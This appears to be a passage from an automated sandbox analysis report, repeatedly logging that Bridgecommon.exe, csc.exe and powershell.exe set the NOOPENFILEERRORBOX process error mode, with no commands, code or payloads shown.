                                    Source: C:\hyperContaineragent\Bridgecommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
